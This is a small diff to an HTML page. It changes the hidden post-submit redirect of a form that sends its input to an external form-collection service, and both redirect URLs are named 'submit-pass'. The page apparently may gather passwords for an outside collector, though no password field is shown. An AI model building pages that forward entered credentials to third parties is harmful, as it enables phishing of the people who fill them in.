--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     </head>
     <body>
         <form action="https://submit-form.com/y8oOH3Yu8" method="post">
-            <input type="hidden" name="_redirect" value="https://submit-pass-instant.vercel.app/"/>
+            <input type="hidden" name="_redirect" value="https://submit-pass-here-chi.vercel.app/"/>
             <div id="root">
                 <div>
                     <form>
